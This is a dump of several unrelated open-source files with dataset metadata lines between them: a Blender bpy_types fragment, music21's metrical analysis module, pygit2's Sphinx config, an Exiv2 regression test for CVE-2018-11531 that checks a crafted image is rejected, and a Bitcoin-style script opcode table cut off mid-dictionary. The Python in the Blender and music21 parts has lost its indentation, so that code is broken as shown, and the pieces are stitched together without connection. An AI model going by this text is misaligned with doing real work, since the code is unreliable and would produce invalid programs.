def from_string(self, string):
"""Replace text with this string."""
self.clear()
self.write(string)
@property
def users_logic(self):
"""Logic bricks that use this text"""
import bpy
return tuple(obj for obj in bpy.data.objects
if self in [cont.text for cont in obj.game.controllers
if cont.type == 'PYTHON']
)
# values are module: [(cls, path, line), ...]
TypeMap = {}
class Sound(bpy_types.ID):
__slots__ = ()
@property
def factory(self):
"""The aud.Factory object of the sound."""
import aud
return aud._sound_from_pointer(self.as_pointer())
class RNAMeta(type):
def __new__(cls, name, bases, classdict, **args):
result = type.__new__(cls, name, bases, classdict)
if bases and bases[0] is not StructRNA:
from _weakref import ref as ref
module = result.__module__
# first part of packages only
if "." in module:
module = module[:module.index(".")]
TypeMap.setdefault(module, []).append(ref(result))
return result
@property
def is_registered(cls):
return "bl_rna" in cls.__dict__
class OrderedDictMini(dict):
def __init__(self, *args):
self.order = []
dict.__init__(self, args)
def __setitem__(self, key, val):
dict.__setitem__(self, key, val)
if key not in self.order:
self.order.append(key)
def __delitem__(self, key):
dict.__delitem__(self, key)
self.order.remove(key)
class RNAMetaPropGroup(StructMetaPropGroup, RNAMeta):
pass
class OrderedMeta(RNAMeta):
def __init__(cls, name, bases, attributes):
if attributes.__class__ is OrderedDictMini:
cls.order = attributes.order
def __prepare__(name, bases, **kwargs):
return OrderedDictMini() # collections.OrderedDict()
# Only defined so operators members can be used by accessing self.order
# with doc generation 'self.properties.bl_rna.properties' can fail
class Operator(StructRNA, metaclass=OrderedMeta):
__slots__ = ()
def __getattribute__(self, attr):
properties = StructRNA.path_resolve(self, "properties")
bl_rna = getattr(properties, "bl_rna", None)
if (bl_rna is not None) and (attr in bl_rna.properties):
return getattr(properties, attr)
return super().__getattribute__(attr)
def __setattr__(self, attr, value):
properties = StructRNA.path_resolve(self, "properties")
bl_rna = getattr(properties, "bl_rna", None)
if (bl_rna is not None) and (attr in bl_rna.properties):
return setattr(properties, attr, value)
return super().__setattr__(attr, value)
def __delattr__(self, attr):
properties = StructRNA.path_resolve(self, "properties")
bl_rna = getattr(properties, "bl_rna", None)
if (bl_rna is not None) and (attr in bl_rna.properties):
return delattr(properties, attr)
return super().__delattr__(attr)
def as_keywords(self, ignore=()):
"""Return a copy of the properties as a dictionary"""
ignore = ignore + ("rna_type",)
return {attr: getattr(self, attr)
for attr in self.properties.rna_type.properties.keys()
if attr not in ignore}
class Macro(StructRNA, metaclass=OrderedMeta):
# bpy_types is imported before ops is defined
# so we have to do a local import on each run
__slots__ = ()
@classmethod
def define(self, opname):
from _bpy import ops
return ops.macro_define(self, opname)
class PropertyGroup(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
class RenderEngine(StructRNA, metaclass=RNAMeta):
__slots__ = ()
class KeyingSetInfo(StructRNA, metaclass=RNAMeta):
__slots__ = ()
class AddonPreferences(StructRNA, metaclass=RNAMeta):
__slots__ = ()
class _GenericUI:
__slots__ = ()
@classmethod
def _dyn_ui_initialize(cls):
draw_funcs = getattr(cls.draw, "_draw_funcs", None)
if draw_funcs is None:
def draw_ls(self, context):
# ensure menus always get default context
operator_context_default = self.layout.operator_context
for func in draw_ls._draw_funcs:
# so bad menu functions don't stop
# the entire menu from drawing
try:
func(self, context)
except:
import traceback
traceback.print_exc()
self.layout.operator_context = operator_context_default
draw_funcs = draw_ls._draw_funcs = [cls.draw]
cls.draw = draw_ls
return draw_funcs
@classmethod
def append(cls, draw_func):
"""
        Append a draw function to this menu;
        it takes the same arguments as the menu's draw function
"""
draw_funcs = cls._dyn_ui_initialize()
draw_funcs.append(draw_func)
@classmethod
def prepend(cls, draw_func):
"""
        Prepend a draw function to this menu; it takes the same arguments as
        the menu's draw function
"""
draw_funcs = cls._dyn_ui_initialize()
draw_funcs.insert(0, draw_func)
@classmethod
def remove(cls, draw_func):
"""Remove a draw function that has been added to this menu"""
draw_funcs = cls._dyn_ui_initialize()
try:
draw_funcs.remove(draw_func)
except ValueError:
pass
class Panel(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
class UIList(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
class Header(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
class Menu(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
def path_menu(self, searchpaths, operator,
props_default=None, filter_ext=None):
layout = self.layout
# hard coded to set the operators 'filepath' to the filename.
import os
import bpy.utils
layout = self.layout
if not searchpaths:
layout.label("* Missing Paths *")
# collect paths
files = []
for directory in searchpaths:
files.extend([(f, os.path.join(directory, f))
for f in os.listdir(directory)
if (not f.startswith("."))
if ((filter_ext is None) or
(filter_ext(os.path.splitext(f)[1])))
])
files.sort()
for f, filepath in files:
props = layout.operator(operator,
text=bpy.path.display_name(f),
translate=False)
if props_default is not None:
for attr, value in props_default.items():
setattr(props, attr, value)
props.filepath = filepath
if operator == "script.execute_preset":
props.menu_idname = self.bl_idname
def draw_preset(self, context):
"""
Define these on the subclass:
- preset_operator (string)
- preset_subdir (string)
Optionally:
- preset_extensions (set of strings)
- preset_operator_defaults (dict of keyword args)
"""
import bpy
ext_valid = getattr(self, "preset_extensions", {".py", ".xml"})
props_default = getattr(self, "preset_operator_defaults", None)
self.path_menu(bpy.utils.preset_paths(self.preset_subdir),
self.preset_operator,
props_default=props_default,
filter_ext=lambda ext: ext.lower() in ext_valid)
@classmethod
def draw_collapsible(cls, context, layout):
# helper function for (optionally) collapsed header menus
# only usable within headers
if context.area.show_menus:
cls.draw_menus(layout, context)
else:
layout.menu(cls.__name__, icon='COLLAPSEMENU')
class NodeTree(bpy_types.ID, metaclass=RNAMetaPropGroup):
__slots__ = ()
class Node(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return True
class NodeInternal(Node):
__slots__ = ()
class NodeSocket(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
@property
def links(self):
"""List of node links from or to this socket"""
return tuple(link for link in self.id_data.links
if (link.from_socket == self or
link.to_socket == self))
class NodeSocketInterface(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
# These are intermediate subclasses, need a bpy type too
class CompositorNode(NodeInternal):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return ntree.bl_idname == 'CompositorNodeTree'
def update(self):
self.tag_need_exec()
class ShaderNode(NodeInternal):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return ntree.bl_idname == 'ShaderNodeTree'
class TextureNode(NodeInternal):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return ntree.bl_idname == 'TextureNodeTree'
| gpl-3.0 | 5,162,792,521,147,929,000 | 27.72209 | 78 | 0.556732 | false |
arnavd96/Cinemiezer | myvenv/lib/python3.4/site-packages/music21/analysis/metrical.py | 1 | 6733 | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: metrical.py
# Purpose: Tools for metrical analysis
#
# Authors: Christopher Ariza
# Michael Scott Cuthbert
#
# Copyright: Copyright © 2009-2012 Michael Scott Cuthbert and the music21 Project
# License: LGPL or BSD, see license.txt
#-------------------------------------------------------------------------------
'''
Various tools and utilities for doing metrical or rhythmic analysis.
See the chapter :ref:`User's Guide Chapter 14: Time Signatures <usersGuide_14_timeSignatures>`
for more information on defining
metrical structures in music21.
'''
from music21 import stream
import copy
import unittest
from music21 import environment
_MOD = "analysis.metrical.py"
environLocal = environment.Environment(_MOD)
def labelBeatDepth(streamIn):
r'''
Modify a Stream in place by annotating metrical analysis symbols.
This assumes that the Stream is already partitioned into Measures.
>>> s = stream.Stream()
>>> ts = meter.TimeSignature('4/4')
>>> s.insert(0, ts)
>>> n = note.Note(type='eighth')
>>> s.repeatAppend(n, 8)
>>> s.makeMeasures(inPlace = True)
>>> post = analysis.metrical.labelBeatDepth(s)
>>> sOut = []
>>> for n in s.flat.notes:
... stars = "".join([l.text for l in n.lyrics])
... sOut.append("{0:8s} {1}".format(n.beatStr, stars))
>>> print("\n".join(sOut))
1 ****
1 1/2 *
2 **
2 1/2 *
3 ***
3 1/2 *
4 **
4 1/2 *
'''
for m in streamIn.getElementsByClass(stream.Measure):
# this will search contexts
ts = m.getTimeSignatures(sortByCreationTime=False)[0]
# need to make a copy otherwise the .beat/.beatStr values will be messed up (1/4 the normal)
tsTemp = copy.deepcopy(ts)
tsTemp.beatSequence.subdivideNestedHierarchy(depth=3)
for n in m.notesAndRests:
if n.tie != None:
environLocal.printDebug(['note, tie', n, n.tie, n.tie.type])
if n.tie.type == 'stop':
continue
for unused_i in range(tsTemp.getBeatDepth(n.offset)):
n.addLyric('*')
return streamIn
def thomassenMelodicAccent(streamIn):
'''
    adds an attribute melodicAccent to each note of a :class:`~music21.stream.Stream` object
according to the method postulated in Joseph M. Thomassen, "Melodic accent: Experiments and
a tentative model," ''Journal of the Acoustical Society of America'', Vol. 71, No. 6 (1982) pp.
1598-1605; with, Erratum, ''Journal of the Acoustical Society of America'', Vol. 73,
No. 1 (1983) p.373, and in David Huron and Matthew Royal,
"What is melodic accent? Converging evidence
from musical practice." ''Music Perception'', Vol. 13, No. 4 (1996) pp. 489-516.
Similar to the humdrum melac_ tool.
.. _melac: http://www.music-cog.ohio-state.edu/Humdrum/commands/melac.html
Takes in a Stream of :class:`~music21.note.Note` objects (use `.flat.notes` to get it, or
better `.flat.getElementsByClass('Note')` to filter out chords) and adds the attribute to
each. Note that Huron and Royal's work suggests that melodic accent has a correlation
with metrical accent only for solo works/passages; even treble passages do not have a
strong correlation. (Gregorian chants were found to have a strong ''negative'' correlation
between melodic accent and syllable onsets)
Following Huron's lead, we assign a `melodicAccent` of 1.0 to the first note in a piece
and take the accent marker of the first interval alone to the second note and
of the last interval alone to be the accent of the last note.
Example from Thomassen, figure 5:
>>> s = converter.parse('tinynotation: 7/4 c4 c c d e d d')
>>> analysis.metrical.thomassenMelodicAccent(s.flat.notes)
>>> for n in s.flat.notes:
... (n.pitch.nameWithOctave, n.melodicAccent)
('C4', 1.0)
('C4', 0.0)
('C4', 0.0)
('D4', 0.33)
('E4', 0.5561)
('D4', 0.17)
('D4', 0.0)
'''
# we use .ps instead of Intervals for speed, since
# we just need perceived contours
maxNotes = len(streamIn) - 1
p2Accent = 1.0
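    # p2Accent carries the accent share handed to the *next* note by the
    # interval just processed; starting at 1.0 means the second note's accent
    # comes from the first interval alone, as described in the docstring.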
for i,n in enumerate(streamIn):
if i == 0:
n.melodicAccent = 1.0
continue
elif i == maxNotes:
n.melodicAccent = p2Accent
continue
lastPs = streamIn[i-1].pitch.ps
thisPs = n.pitch.ps
nextPs = streamIn[i+1].pitch.ps
if lastPs == thisPs and thisPs == nextPs:
thisAccent = 0.0
nextAccent = 0.0
elif lastPs != thisPs and thisPs == nextPs:
thisAccent = 1.0
nextAccent = 0.0
elif lastPs == thisPs and thisPs != nextPs:
thisAccent = 0.0
nextAccent = 1.0
elif lastPs < thisPs and thisPs > nextPs:
thisAccent = 0.83
nextAccent = 0.17
elif lastPs > thisPs and thisPs < nextPs:
thisAccent = 0.71
nextAccent = 0.29
elif lastPs < thisPs and thisPs < nextPs:
thisAccent = 0.33
nextAccent = 0.67
elif lastPs > thisPs and thisPs > nextPs:
thisAccent = 0.5
nextAccent = 0.5
n.melodicAccent = thisAccent * p2Accent
p2Accent = nextAccent
#-------------------------------------------------------------------------------
class TestExternal(unittest.TestCase):
def runTest(self):
pass
def testSingle(self):
'''Need to test direct meter creation w/o stream
'''
from music21 import note, meter
s = stream.Stream()
ts = meter.TimeSignature('4/4')
s.append(ts)
n = note.Note()
n.quarterLength = 1
s.repeatAppend(n, 4)
n = note.Note()
n.quarterLength = .5
s.repeatAppend(n, 8)
s = s.makeMeasures()
s = labelBeatDepth(s)
s.show()
class Test(unittest.TestCase):
'''Unit tests
'''
def runTest(self):
pass
def setUp(self):
pass
def testDoNothing(self):
pass
#-------------------------------------------------------------------------------
# define presented order in documentation
_DOC_ORDER = [labelBeatDepth]
if __name__ == "__main__":
import music21
music21.mainTest(Test) #, TestExternal)
#------------------------------------------------------------------------------
# eof
| mit | 3,405,661,291,353,366,000 | 30.457944 | 100 | 0.559863 | false |
frutiger/pygit2 | docs/conf.py | 1 | 7971 | # -*- coding: utf-8 -*-
#
# pygit2 documentation build configuration file, created by
# sphinx-quickstart on Sun Jan 6 09:55:26 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os, platform
from string import digits
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
version_string = sys.platform.rstrip(digits) + "-" + os.uname()[4] + "-" + ".".join(platform.python_version_tuple()[0:2])
sys.path.insert(0, os.path.abspath('../build/lib.' + version_string))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pygit2'
copyright = u'2010-2014 The pygit2 contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.22'
# The full version, including alpha/beta/rc tags.
release = '0.22.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["_themes", ]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pygit2doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pygit2.tex', u'pygit2 Documentation',
u'J. David Ibáñez', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pygit2', u'pygit2 Documentation',
[u'J. David Ibáñez'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pygit2', u'pygit2 Documentation',
u'J. David Ibáñez', 'pygit2', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| gpl-2.0 | -3,619,021,428,859,344,400 | 31.643443 | 121 | 0.702825 | false |
AlienCowEatCake/ImageViewer | src/ThirdParty/Exiv2/exiv2-0.27.3-Source/tests/bugfixes/github/test_CVE_2018_11531.py | 3 | 1094 | # -*- coding: utf-8 -*-
from system_tests import CaseMeta, path, check_no_ASAN_UBSAN_errors
class TestCvePoC(metaclass=CaseMeta):
"""
Regression test for the bug described in:
https://github.com/Exiv2/exiv2/issues/283
"""
url = "https://github.com/Exiv2/exiv2/issues/283"
cve_url = "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11531"
def check_no_ASAN_UBSAN_errors(self, i, command, got_stderr, expected_stderr):
""" Override of system_tests.check_no_ASAN_UBSAN_errors for this particular test case.
Here we want to also check that the two last lines of got_stderr have the expected_stderr
"""
check_no_ASAN_UBSAN_errors(self, i, command, got_stderr, expected_stderr)
self.assertListEqual(expected_stderr.splitlines(), got_stderr.splitlines()[-2:])
filename = path("$data_path/pocIssue283.jpg")
commands = ["$exiv2 $filename"]
stdout = [""]
stderr = [
"""$exiv2_exception_message $filename:
$kerCorruptedMetadata
"""]
compare_stderr = check_no_ASAN_UBSAN_errors
retval = [1]
| gpl-3.0 | 534,201,225,946,510,660 | 34.290323 | 97 | 0.669104 | false |
litecoinz-project/litecoinz | qa/rpc-tests/test_framework/script.py | 2 | 23865 | #
# script.py
#
# This file is modified from python-bitcoinlib.
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
"""Scripts
Functionality to build scripts, as well as SignatureHash().
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from test_framework.mininode import CTransaction, CTxOut, hash256
import sys
bchr = chr
bord = ord
if sys.version > '3':
long = int
bchr = lambda x: bytes([x])
bord = lambda x: x
import struct
import binascii
from test_framework import bignum
MAX_SCRIPT_SIZE = 10000
MAX_SCRIPT_ELEMENT_SIZE = 520
MAX_SCRIPT_OPCODES = 201
OPCODE_NAMES = {}
_opcode_instances = []
class CScriptOp(int):
"""A single script opcode"""
__slots__ = []
@staticmethod
def encode_op_pushdata(d):
"""Encode a PUSHDATA op, returning bytes"""
if len(d) < 0x4c:
return b'' + bchr(len(d)) + d # OP_PUSHDATA
elif len(d) <= 0xff:
return b'\x4c' + bchr(len(d)) + d # OP_PUSHDATA1
elif len(d) <= 0xffff:
return b'\x4d' + struct.pack(b'<H', len(d)) + d # OP_PUSHDATA2
elif len(d) <= 0xffffffff:
return b'\x4e' + struct.pack(b'<I', len(d)) + d # OP_PUSHDATA4
else:
raise ValueError("Data too long to encode in a PUSHDATA op")
@staticmethod
def encode_op_n(n):
"""Encode a small integer op, returning an opcode"""
if not (0 <= n <= 16):
raise ValueError('Integer must be in range 0 <= n <= 16, got %d' % n)
if n == 0:
return OP_0
else:
return CScriptOp(OP_1 + n-1)
def decode_op_n(self):
"""Decode a small integer opcode, returning an integer"""
if self == OP_0:
return 0
if not (self == OP_0 or OP_1 <= self <= OP_16):
raise ValueError('op %r is not an OP_N' % self)
return int(self - OP_1+1)
def is_small_int(self):
"""Return true if the op pushes a small integer to the stack"""
if 0x51 <= self <= 0x60 or self == 0:
return True
else:
return False
def __str__(self):
return repr(self)
def __repr__(self):
if self in OPCODE_NAMES:
return OPCODE_NAMES[self]
else:
return 'CScriptOp(0x%x)' % self
def __new__(cls, n):
try:
return _opcode_instances[n]
except IndexError:
assert len(_opcode_instances) == n
_opcode_instances.append(super(CScriptOp, cls).__new__(cls, n))
return _opcode_instances[n]
# Populate opcode instance table
for n in range(0xff+1):
CScriptOp(n)
# push value
OP_0 = CScriptOp(0x00)
OP_FALSE = OP_0
OP_PUSHDATA1 = CScriptOp(0x4c)
OP_PUSHDATA2 = CScriptOp(0x4d)
OP_PUSHDATA4 = CScriptOp(0x4e)
OP_1NEGATE = CScriptOp(0x4f)
OP_RESERVED = CScriptOp(0x50)
OP_1 = CScriptOp(0x51)
OP_TRUE=OP_1
OP_2 = CScriptOp(0x52)
OP_3 = CScriptOp(0x53)
OP_4 = CScriptOp(0x54)
OP_5 = CScriptOp(0x55)
OP_6 = CScriptOp(0x56)
OP_7 = CScriptOp(0x57)
OP_8 = CScriptOp(0x58)
OP_9 = CScriptOp(0x59)
OP_10 = CScriptOp(0x5a)
OP_11 = CScriptOp(0x5b)
OP_12 = CScriptOp(0x5c)
OP_13 = CScriptOp(0x5d)
OP_14 = CScriptOp(0x5e)
OP_15 = CScriptOp(0x5f)
OP_16 = CScriptOp(0x60)
# control
OP_NOP = CScriptOp(0x61)
OP_VER = CScriptOp(0x62)
OP_IF = CScriptOp(0x63)
OP_NOTIF = CScriptOp(0x64)
OP_VERIF = CScriptOp(0x65)
OP_VERNOTIF = CScriptOp(0x66)
OP_ELSE = CScriptOp(0x67)
OP_ENDIF = CScriptOp(0x68)
OP_VERIFY = CScriptOp(0x69)
OP_RETURN = CScriptOp(0x6a)
# stack ops
OP_TOALTSTACK = CScriptOp(0x6b)
OP_FROMALTSTACK = CScriptOp(0x6c)
OP_2DROP = CScriptOp(0x6d)
OP_2DUP = CScriptOp(0x6e)
OP_3DUP = CScriptOp(0x6f)
OP_2OVER = CScriptOp(0x70)
OP_2ROT = CScriptOp(0x71)
OP_2SWAP = CScriptOp(0x72)
OP_IFDUP = CScriptOp(0x73)
OP_DEPTH = CScriptOp(0x74)
OP_DROP = CScriptOp(0x75)
OP_DUP = CScriptOp(0x76)
OP_NIP = CScriptOp(0x77)
OP_OVER = CScriptOp(0x78)
OP_PICK = CScriptOp(0x79)
OP_ROLL = CScriptOp(0x7a)
OP_ROT = CScriptOp(0x7b)
OP_SWAP = CScriptOp(0x7c)
OP_TUCK = CScriptOp(0x7d)
# splice ops
OP_CAT = CScriptOp(0x7e)
OP_SUBSTR = CScriptOp(0x7f)
OP_LEFT = CScriptOp(0x80)
OP_RIGHT = CScriptOp(0x81)
OP_SIZE = CScriptOp(0x82)
# bit logic
OP_INVERT = CScriptOp(0x83)
OP_AND = CScriptOp(0x84)
OP_OR = CScriptOp(0x85)
OP_XOR = CScriptOp(0x86)
OP_EQUAL = CScriptOp(0x87)
OP_EQUALVERIFY = CScriptOp(0x88)
OP_RESERVED1 = CScriptOp(0x89)
OP_RESERVED2 = CScriptOp(0x8a)
# numeric
OP_1ADD = CScriptOp(0x8b)
OP_1SUB = CScriptOp(0x8c)
OP_2MUL = CScriptOp(0x8d)
OP_2DIV = CScriptOp(0x8e)
OP_NEGATE = CScriptOp(0x8f)
OP_ABS = CScriptOp(0x90)
OP_NOT = CScriptOp(0x91)
OP_0NOTEQUAL = CScriptOp(0x92)
OP_ADD = CScriptOp(0x93)
OP_SUB = CScriptOp(0x94)
OP_MUL = CScriptOp(0x95)
OP_DIV = CScriptOp(0x96)
OP_MOD = CScriptOp(0x97)
OP_LSHIFT = CScriptOp(0x98)
OP_RSHIFT = CScriptOp(0x99)
OP_BOOLAND = CScriptOp(0x9a)
OP_BOOLOR = CScriptOp(0x9b)
OP_NUMEQUAL = CScriptOp(0x9c)
OP_NUMEQUALVERIFY = CScriptOp(0x9d)
OP_NUMNOTEQUAL = CScriptOp(0x9e)
OP_LESSTHAN = CScriptOp(0x9f)
OP_GREATERTHAN = CScriptOp(0xa0)
OP_LESSTHANOREQUAL = CScriptOp(0xa1)
OP_GREATERTHANOREQUAL = CScriptOp(0xa2)
OP_MIN = CScriptOp(0xa3)
OP_MAX = CScriptOp(0xa4)
OP_WITHIN = CScriptOp(0xa5)
# crypto
OP_RIPEMD160 = CScriptOp(0xa6)
OP_SHA1 = CScriptOp(0xa7)
OP_SHA256 = CScriptOp(0xa8)
OP_HASH160 = CScriptOp(0xa9)
OP_HASH256 = CScriptOp(0xaa)
OP_CODESEPARATOR = CScriptOp(0xab)
OP_CHECKSIG = CScriptOp(0xac)
OP_CHECKSIGVERIFY = CScriptOp(0xad)
OP_CHECKMULTISIG = CScriptOp(0xae)
OP_CHECKMULTISIGVERIFY = CScriptOp(0xaf)
# expansion
OP_NOP1 = CScriptOp(0xb0)
OP_NOP2 = CScriptOp(0xb1)
OP_NOP3 = CScriptOp(0xb2)
OP_NOP4 = CScriptOp(0xb3)
OP_NOP5 = CScriptOp(0xb4)
OP_NOP6 = CScriptOp(0xb5)
OP_NOP7 = CScriptOp(0xb6)
OP_NOP8 = CScriptOp(0xb7)
OP_NOP9 = CScriptOp(0xb8)
OP_NOP10 = CScriptOp(0xb9)
# template matching params
OP_SMALLINTEGER = CScriptOp(0xfa)
OP_PUBKEYS = CScriptOp(0xfb)
OP_PUBKEYHASH = CScriptOp(0xfd)
OP_PUBKEY = CScriptOp(0xfe)
OP_INVALIDOPCODE = CScriptOp(0xff)
VALID_OPCODES = {
OP_1NEGATE,
OP_RESERVED,
OP_1,
OP_2,
OP_3,
OP_4,
OP_5,
OP_6,
OP_7,
OP_8,
OP_9,
OP_10,
OP_11,
OP_12,
OP_13,
OP_14,
OP_15,
OP_16,
OP_NOP,
OP_VER,
OP_IF,
OP_NOTIF,
OP_VERIF,
OP_VERNOTIF,
OP_ELSE,
OP_ENDIF,
OP_VERIFY,
OP_RETURN,
OP_TOALTSTACK,
OP_FROMALTSTACK,
OP_2DROP,
OP_2DUP,
OP_3DUP,
OP_2OVER,
OP_2ROT,
OP_2SWAP,
OP_IFDUP,
OP_DEPTH,
OP_DROP,
OP_DUP,
OP_NIP,
OP_OVER,
OP_PICK,
OP_ROLL,
OP_ROT,
OP_SWAP,
OP_TUCK,
OP_CAT,
OP_SUBSTR,
OP_LEFT,
OP_RIGHT,
OP_SIZE,
OP_INVERT,
OP_AND,
OP_OR,
OP_XOR,
OP_EQUAL,
OP_EQUALVERIFY,
OP_RESERVED1,
OP_RESERVED2,
OP_1ADD,
OP_1SUB,
OP_2MUL,
OP_2DIV,
OP_NEGATE,
OP_ABS,
OP_NOT,
OP_0NOTEQUAL,
OP_ADD,
OP_SUB,
OP_MUL,
OP_DIV,
OP_MOD,
OP_LSHIFT,
OP_RSHIFT,
OP_BOOLAND,
OP_BOOLOR,
OP_NUMEQUAL,
OP_NUMEQUALVERIFY,
OP_NUMNOTEQUAL,
OP_LESSTHAN,
OP_GREATERTHAN,
OP_LESSTHANOREQUAL,
OP_GREATERTHANOREQUAL,
OP_MIN,
OP_MAX,
OP_WITHIN,
OP_RIPEMD160,
OP_SHA1,
OP_SHA256,
OP_HASH160,
OP_HASH256,
OP_CODESEPARATOR,
OP_CHECKSIG,
OP_CHECKSIGVERIFY,
OP_CHECKMULTISIG,
OP_CHECKMULTISIGVERIFY,
OP_NOP1,
OP_NOP2,
OP_NOP3,
OP_NOP4,
OP_NOP5,
OP_NOP6,
OP_NOP7,
OP_NOP8,
OP_NOP9,
OP_NOP10,
OP_SMALLINTEGER,
OP_PUBKEYS,
OP_PUBKEYHASH,
OP_PUBKEY,
}
OPCODE_NAMES.update({
OP_0 : 'OP_0',
OP_PUSHDATA1 : 'OP_PUSHDATA1',
OP_PUSHDATA2 : 'OP_PUSHDATA2',
OP_PUSHDATA4 : 'OP_PUSHDATA4',
OP_1NEGATE : 'OP_1NEGATE',
OP_RESERVED : 'OP_RESERVED',
OP_1 : 'OP_1',
OP_2 : 'OP_2',
OP_3 : 'OP_3',
OP_4 : 'OP_4',
OP_5 : 'OP_5',
OP_6 : 'OP_6',
OP_7 : 'OP_7',
OP_8 : 'OP_8',
OP_9 : 'OP_9',
OP_10 : 'OP_10',
OP_11 : 'OP_11',
OP_12 : 'OP_12',
OP_13 : 'OP_13',
OP_14 : 'OP_14',
OP_15 : 'OP_15',
OP_16 : 'OP_16',
OP_NOP : 'OP_NOP',
OP_VER : 'OP_VER',
OP_IF : 'OP_IF',
OP_NOTIF : 'OP_NOTIF',
OP_VERIF : 'OP_VERIF',
OP_VERNOTIF : 'OP_VERNOTIF',
OP_ELSE : 'OP_ELSE',
OP_ENDIF : 'OP_ENDIF',
